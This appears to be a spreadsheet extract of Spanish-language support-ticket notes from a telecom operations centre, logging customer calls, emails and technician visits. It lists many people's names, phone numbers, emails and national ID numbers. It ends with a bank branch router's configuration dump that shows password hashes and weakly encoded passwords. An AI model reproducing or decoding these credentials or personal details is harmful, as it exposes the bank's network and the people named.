PARA: KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; RAMOS LERIZTA ILIANA &lt;IRLERIZT@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002277123OC ::: TICKET CNOC IMSCI002772 ::: "SERVICIO FUERA"
BUENAS TARDES ESTIMADOS (A):
COMO PARTE DEL SEGUIMIENTO AL CASO TICKET CNOC IMSCI002772: "SERVICIO FUERA", SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES ANTES PLANTEADOS. SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO LLEGANDO A IP WAN DE PUNTO REMOTO CON BGP ESTABLECIDO SIN EVENTOS RECIENTES (FIGURA 1). GRACIAS DE ANTEMANO. SALUDOS CORDIALES.
FIGURA 1. SE VALIDA SERVICIO OPERATIVO ALCANZABLE A NIVEL DE PING CON BGP ESTABLECIDO.</t>
  </si>
  <si>
    <t>F4564075</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRENDA MEDEZ 56799028 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001604172</t>
  </si>
  <si>
    <t>F4564148</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESDRAS VASQUEZ  25069510 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001598892</t>
  </si>
  <si>
    <t>F4564149</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENCARGADO DE TURNO AL 78550589 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001620689
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78550589 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001589141</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 78550589 CONTESTA EL SEÑOR DIEGO PINEDA INDICA QUE AUN NO CUENTAN CON SERVICIO || SE CONTACTO A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001664430
**</t>
  </si>
  <si>
    <t>F4564172</t>
  </si>
  <si>
    <t>NO SE TIENE EN BANDEJA DE DICTAMENESCC LA SOLICITUD ANTERIOR; EN ESPERA DE LA ELABORACIÓN DEL RFO EN 48/72 HORAS HÁBILES, SE ESPERA TENERLO EN EL TRANSCURSO DE ESTA SEMANA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 RESPONDE MALAQUIAS, MENCIONA QUE TODO ESTA FUNCIONANDO DE MANERA CORRECTA PERO SOLICITA RFO
-ID 2001586119</t>
  </si>
  <si>
    <t>SE ENVIA SOLICITUD DE DICTAMEN
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 8:23
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD RFO || OPERADORA DE TIENDAS S.A. || 344400580T || SD1125630
BUEN DÍA
   SOLICITO DE SU AMABLE APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA	ID 	TICKET
OPERADORA DE TIENDAS S.A.
344400580T
SD1125630
CUALQUIER CONSULTA, A LA ORDEN.
*--*-*-*-*</t>
  </si>
  <si>
    <t>F4564203</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR SERVICIO//A LA ESPERA DE RESPUESTA
ELVYN ARIEL LOPEZ RECINOS
DOM 15/05/2022 16:31
BUENA TARDE ESTIMADO CLIENTE;
SE LE INFORMA QUE EL SERVICIO A NIVEL DE LA RED DE CLARO SE ENCUENTRA OPERATIVO Y ESTABLE, SU APOYO VALIDANDO NUEVAMENTE.
EVIDENCIA:</t>
  </si>
  <si>
    <t>F4564208</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID ALFONSO PORRAS 24205032 - 24205590 RESPONDE CRISTIAN, INDICA QUE YA ESTAN AUTORIZADOS LOS PERMISOS DE PERSONAL TECNICO
-ID 2001593825 - 2001594314</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN HERNANDEZ AL 58335201 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001157284
**</t>
  </si>
  <si>
    <t>F4564218</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR PEÑA 95115052 INDICA QUE YA EL TECNICO DE CLARO LE LLAMO Y LE BRINDO LA DIRECCION QUE ES  BARRIO LAS PALMAS 4TA Y 5TA AVENIDA BULEVAR JUAN PABLO SEGUNDO SAN PEDRO SULA **
ID 2001581382
**</t>
  </si>
  <si>
    <t>F4564219</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE MIGUEL PEREZ 48533050 MENCIONA QUE ES PROBLEMA CON UN SWITCH INTERNO
-ID 2001584125</t>
  </si>
  <si>
    <t>F4564236</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO CONTACTO DE SITIO Y HORARIO DE ATENCION//A LA ESPERA DE RESPUESTA.
ELVYN ARIEL LOPEZ RECINOS
DOM 15/05/2022 17:53
BUENA TARDE ESTIMADO CLIENTE;
SE LE INFORMA QUE SE REALIZARON LAS VERIFICACIÓN CORRESPONDIENTES Y SE TIENE PUERTO ÓPTICO DOWN HACIA LOS EQUIPOS DEL CLIENTE, SU APOYO CON PROPORCIONAR CONTACTO DE SITIO Y HORARIO DE ATENCIÓN.
SALUDOS
++</t>
  </si>
  <si>
    <t>F4564251</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE CRISTIA HERNANDEZ 61821673 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001682788 - 2001683185</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIA HERNANDEZ 77423027 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE INDICA QUE EL DIA DE AYER PRESENTARON PROBLEMA DE ENERGIA
-ID 2001683870</t>
  </si>
  <si>
    <t>F4564410</t>
  </si>
  <si>
    <t>***--- CL PIDE MONITOREO HASTA HOY A LAS 06:00 HRS --**
DE: STEVEN MARQUEZ (VENDOR) [MAILTO:STEVEN.MARQUEZ@WALMART.COM]
ENVIADO EL: LUNES, 16 DE MAYO DE 2022 00:31
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; NOE PEREZ &lt;NOE.PEREZ1@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF LA TINTA ID: 344400304
BUENA NOCHE,
MUCHAS GRACIAS POR LA INFORMACIÓN BRINDADA, FAVOR DEJAR EN MONITOREO EL SERVICIO HASTA LAS 6 DE LA MAÑANA. Y PROCEDER CON EL CIERRE DE TICKET.
SLDS;</t>
  </si>
  <si>
    <t>F4564574</t>
  </si>
  <si>
    <t>F4564590</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78321094 RESPONDE BYRON MENCIONA QUE TODO ESTA FUNCIONANDO BIEN Y NO HAN PRESENTADO PROBLEMAS, SE VALIDARA EL FUNCIONAMIENTO A LAS 17:30
-ID 2001760270 - 2001760817</t>
  </si>
  <si>
    <t>***---  SE ENVÍA CORREO A CL  INDICANDO AVANCES ---***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 17 DE MAYO DE 2022 03:05
PARA: JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE INTERNET C634_38300513
BUENOS DÍAS ESTIMADO SR. SIERRA.
                SE CONVERSÓ CON PERSONAL EN SITIO A LAS 17:30 HRS Y NOS CONFIRMÓ QUE EL SERVICIO CONTINUABA ESTABLE.
PERSONAL DE CNOC CONTINUA OBSERVANDO EL SERVICIO Y SE LLAMARA EN HORARIO HÁBIL NUEVAMENTE AL PUNTO REMOTO PARA CONSULTAR NUEVAMENTE DE QUÉ MANERA HAN PERCIBIDO EL FUNCIONAMIENTO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 78321094 CONTESTA EL SEÑOR  JAIME QUIEN INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO QUE EL INCONVENIENTE SE DE DE 13:00 A 17:00 HRS, SOLICITA QUE SE LE DE SEGUIMIENTO A LAS 15:00 HRS NUEVAMENTE**
ID 2001588181
**
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78321094 BYRON MENCIONA QUE NO HA PRESENTADO NINGUN PROBLEMA POR LO QUE SOLICITA LLAMADA A LAS 16:30
-ID 2001730571</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78321094 RESPONDE JUAN MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE PERO ACABA DE INICIAR LA LLUVIA POR LO QUE SOLICITA LLAMADA PARA LAS  19:30 HRS
-ID 2001776518</t>
  </si>
  <si>
    <t>F4564592</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE CHRISTIAN LOPEZ AL 41856203 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001590729
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE CHRISTIAN LOPEZ AL 41856203 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001602643
**</t>
  </si>
  <si>
    <t>F4564601</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JENIFER MORALES AL  41853376 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
2001596537
**</t>
  </si>
  <si>
    <t>F4564607</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: SOLICITUD DE REVISIÓN || ASIMETRÍA PEPSICO || ID LOCAL 982968</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5298  MENCIONA QUE NECESITAN VALIDAR ALGUNOS TEMAS EN CONJUNTO, PERO SOLICITA SE PUEDA DEVOLVER LA LLAMADA
SE NOTIFICARA A GESTOR PARA EL SEGUIMIENTO
-ID 3001999991 - 1001000437</t>
  </si>
  <si>
    <t>SE LLAMO A TELMEX PARA CONSULTAR DUDAS QUE SE PRESENTAN SOBRE EL SERVICIO PERO LLAMADA QUEDO EN ESPERA---
52 55 5174 5298</t>
  </si>
  <si>
    <t>F4564614</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALDOLFO ALVAREZ 57083529 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001746029</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALDOLFO ALVAREZ  57083529 MENCIONA QUE EL SERVICIO YA SE RESTABLECIO PERO SOLCITA LAS GRAFICAS DEL SERVICIO Y VALIDAR LUEGO DE LAS 14:00 HRS
--- ALVAREZA@CHURCHOFJESUSCHRIST.ORG ----
-ID 2001622889</t>
  </si>
  <si>
    <t>SE ENVIA CORREO CON GRAFICAS ADJUNTAS A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA.
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 15:26
PARA: ALVAREZA@CHURCHOFJESUSCHRIST.ORG &lt;ALVAREZA@CHURCHOFJESUSCHRIST.ORG&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: SD1125814 | IGLESIA DE JESUCRISTO SUD | 349900369T
BUENOS DÍAS, ESTIMADO CLIENTE.
EN SEGUIMIENTO AL SERVICIO REPORTADO SE ADJUNTA LAS SIGUIENTES GRÁFICAS DE CONSUMO DE LAS ÚLTIMAS 48 HORAS.
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA BRINDAR INFORMACIÓN ADICIONAL O PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4564615</t>
  </si>
  <si>
    <t>SE SOLICITA APOYOI NUEVAMENTE A CLIENTE POR CORREO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE PARA LA AGENCIA CC_BANRURAL_GT_AGENCIA_0294, QUEDAMOS AL PENDIENTE DE LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO DE SEGUIIMIENTO YA QUE AUN NO SE CUENTA CON RESPUEST POR PARTE DEL CLIENTE | | ADICIONAL SE ADJUNTO ESTADO ACTUAL DEL ENLACE CON RESPECTO AL ULTIMO REINICIO. LLEVA DOS DIAS ACTIVO
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 18:15PARA: CARLOS FELIPE VELASQUEZ CRISTAL &lt;CARLOSF.VELASQUEZ@CLARO.COM.GT&gt;; KENNY ROBERT RIVERA JUAREZ &lt;KENNY.RIVERA@CLARO.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 TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRRURAL.COM.GT &lt;TIC-TELECOM@BANRRURAL.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;ASUNTO: RE: ENLACE ALARMADO CON REINCIDENCIA CC_BANRURAL_GT_AGENCIA_0294
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL TICKET PROACTIVO F4564615,  CORRESPONDIENTE A LA AGENCIA "CC_BANRURAL_GT_AGENCIA_0294",  SOLICITAMOS SU ACOSTUMBRADO APOYO RESPONDIENDO AL PRIMER CORREO ENVIADO.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4564617</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN PEREZ 72112657 PARA SOLICITAR DATOS DE VISITA TECNICA
-ID 2001645594
NOMBRE DEL CLIENTE: SOCIEDAD DE AHORRO Y CREDITO APOYO INTEGRAL S.A
UBICACIÓN: 4 CALLE ORIENTE #11 CONTIGUO A UNA FERRETERIA GUZMAN APOPA, SAN SALVADOR
CONTACTO EN SITIO: EDWIN PEREZ - 72112657
HORARIO DE ATENCION: HASTA LAS 15:00 HRS
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO - EDWIN.PEREZ@INTEGRAL.COM.SV</t>
  </si>
  <si>
    <t>F4564622</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PEDRO CABRERA 23609205 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001601167</t>
  </si>
  <si>
    <t>F4564628</t>
  </si>
  <si>
    <t>SE LLLAMA A CLIENTE RAFAEL CASTELLANOS-70692332 SE TIENE EN LINEA- SE PASA CASO A PC</t>
  </si>
  <si>
    <t>F4564630</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 10:16
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: G183 - ENLACE CLARO - CON ID 770600033T
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4564631</t>
  </si>
  <si>
    <t>CLIENTE KARLA AVILA 52267340 REALIZA PRUEBAS Y VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 2001599397</t>
  </si>
  <si>
    <t>F4564637</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE  EMANUEL CATAÑOZA 42546491 PARA INFORMAR ACERCA DE LA VISITA, CLIENTE INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS UNICAMENTE INDICA QUE NO LLEGUEN CON MUCHAS COSAS EL TECNICO YA QUE CAYALA HACE UN PROCEDIMIENTO CUANDO TRAE UNA CANTIDAD MAYOR DE EQUIPOS, INDICA QUE SE LE CONTACTE CUANDO LLEGUEN A LAS INSTALACIONES
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SIN EMBARGO SERVICIO NO LEVANTA CON EL REGISTRO CORRECTO, SE LE INDICA AL CLIENTE QUE POR FAVOR SE DEJE DESCONECTADO EL EQUIPO AETHRA Y QUE SE LE CONTACTARA NUEVAMENTE A LAS 9:15 PARA SEGUIR CON LAS PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON TEC BYRON SE DA CODIGO DE CIERRE Y SE INFORMA LOS CAMBIOS REALIZADOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A CLIENTE EMANUEL PARA APOYO CON LA RECONEXION DEL EQUIPO AETHRA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  EMANUEL CATAÑOZA 42546491
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NOS CONFIRMA SERVICIO OPERATIVO, SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4564639</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN ALVIZUREZ 24119191 EXT 10582 - 10583 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001630602 - 2001631338</t>
  </si>
  <si>
    <t>F4564641</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24835360 RESPONDE BRYAN MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCA CON GESTOR
-ID 2001634520</t>
  </si>
  <si>
    <t>F4564642</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL CATAÑOZA 42546491 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001771992</t>
  </si>
  <si>
    <t>SE LLAMA AL  CLIENTE WENDY OROZCO 41835672 PERO ENVÍA A BUZÓN, SE INTENTARA EN UNOS INSTANTES
2001596393
2001596563
2001596685</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EMANUEL CATAÑOZA 42546491 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA A LAS 17:00 HRS
-ID 2001621024</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WENDY OROZCO 41835672 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001620703</t>
  </si>
  <si>
    <t>F4564645</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDEN
-ID 2001769251</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HENRY  AL 54672096 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001661017
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CENTRALES  24119191 EXT 10582 / 10583 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001685312 - 2001685748
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CENTRALES  24119191 EXT 10582- 10583||  NO RESPONDE SE INTENTARA LUEGO **
ID 2001709584 - 2001710227
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24119191 EXT 10582 NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001728775</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24119191 MENCIONA QUE YA TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 2001824812</t>
  </si>
  <si>
    <t>F4564647</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 24119191 PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001638500</t>
  </si>
  <si>
    <t>SE LLAMA A HENRY PARA REALIZAR PRUEBAS PERO ENVIA A BUZON--
54672096</t>
  </si>
  <si>
    <t>SE LLAMA A HENRY PARA REALIZAR PRUEBAS SIN EMBARGO NO RESPONDE
54672096</t>
  </si>
  <si>
    <t>**SE LLAMA A CENTRALES AL 24119191 EXT 10582 / 10583 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001685312 - 2001685748
**</t>
  </si>
  <si>
    <t>F4564648</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO PLANTA EXTERNA-HONDURAS				
	WO OPEN                                			10:10:00 A. M.
1/1	ANA CAROLINA ORDOÑEZ 	33915065	2.5 HORAS	12:40:00
2/4	SAUL PASTOR	33915357	3 HORAS	13:10:00
3/4	MARIO RENDON	31990761	5 HORAS	15:10:00
4/4	PASTOR RAMIREZ  	33910016	6 HORAS	16:10:00</t>
  </si>
  <si>
    <t>CLIENTE VALIDA ACCESOS PARA PERSONAL TECNICO CLARO</t>
  </si>
  <si>
    <t>SE ENVIA INFORMACION
JOSE ANTONIO FERNANDEZ CABRERA
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS   PARA PERSONAL TÉCNICO CON RESPECTO AL ENLACE CON 1625861OH  HUNTSMAN TEXTILE, ADJUNTO DATOS DE PERSONAL TÉCNICO EL CUAL YA SE ENCUENTRA ASIGNADO PARA SOLVENTAR DICHO INCIDENTE.
GEO RED JUAN CARLOS AGUILAR 0801-1988-16853 3190-7613
GEO RED JOSE DAVID AGUILAR AMADOR 0801-1991-17499 3170-6594
QUEDO A LA ESPERA DE SUS COMENTARIOS
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4564651</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON NOGGUERA 32904194 NO RESPONDE, ENVIA DIRECTO A BUZON SE INTENTARA LUEGO**
-ID 2001659961
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON NOGGUERA 32904194 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001640404</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON NOGUERA AL 32904194 NO RESPONDE, ENVIA DIRECTO A BUZON SE INTENTARA LUEGO**
-ID 2001686874
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON NOGUERA AL 32904194  CONTESTA UN SEÑOR INDICA QUE ES NUMERO EQUIVOCADO **
-ID 2001708661
**</t>
  </si>
  <si>
    <t>F4564653</t>
  </si>
  <si>
    <t>CLIENTE NOS COMENTA QUE EL PROBLEMA QUE TEINEE ES QUE NO TIENE AUDIO EN NINGUNA LLAMADA/ TANTO ENTRANTE COMO SALIENTE/ ADEMAS, NOS INDICA QUE NO POSEE NINGUN TIPO DE EQUIPO DE PBX NI DE E1, DEBIDO A QUE SU CENTRAL LO UNICO QUE LES BRINDA ES UNA LINEA TELEFONICA.   CLEINTE ESCALA HACIA SU CENTRAL PARA QUE LE BRINDEN SERGUIMIENTO, EBIDO A QUE DICE QUE LOS EQUIPOS DE CLARO ESTAN EN CENTRAL Y NO EN SUS INTALACIONES ### SE PROCEE AL CIERRE ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA MARCOS LOVATO-79891993 SE TIENE EN LINEA -
2001600664
COLA:
NOMBRE: A: 0050379891993
NÚMERO: 0050379891993
DURACIÓN: 0:00:32
ESTADO: CONECTADA
DETALLES: 0050379891993
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/05/2022 09:05:42</t>
  </si>
  <si>
    <t>F4564655</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JASON PENNANT 56162043 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001641730</t>
  </si>
  <si>
    <t>INFORMA CLIENTE JASON PENNANT 56162043 QUE YA HAY PERSONAL DE CLARO Y CABLES TRABAJANDO EN LA REPARACIÓN DEL SERVICIO. SE CONSULTARÁ A QUIEN SE TIENE ASIGNADO A ESTE CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  JASON PENNANT 56162043 SE CONTACTA Y SE DEJA EN LINEA CON GESTOR **
ID2001658545
**</t>
  </si>
  <si>
    <t>F4564662</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_667&gt;ENA
PASSWORD:
CC_BANRURAL_GT_AGENCIA_667#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3124 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_667
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
ENABLE PASSWORD 7 09584B051E1016
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
!
!
!
!
!
IP CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX162485JG
!
!
ARCHIVE
 LOG CONFIG
  HIDEKEYS
USERNAME GESTIONIP PASSWORD 7 0327570A145F
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.122.44 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8901937T/_/WIMAX
 BANDWIDTH 4096
 IP ADDRESS 10.72.190.22 255.255.255.192
 RATE-LIMIT INPUT 4096000 512000 1024000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 512000 1024000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.136.67.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.166.67.126 255.255.255.0
 DUPLEX AUTO
CC_BANRURAL_GT_AGENCIA_667#SHO IP IT BRIE}
                                   ^
% INVALID INPUT DETECTED AT '^' MARKER.
CC_BANRURAL_GT_AGENCIA_667#SHO IP INT BRUE
                                        ^
% INVALID INPUT DETECTED AT '^' MARKER.
CC_BANRURAL_GT_AGENCIA_667#SHO IP INT BR
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.72.190.22    YES NVRAM  UP                    UP
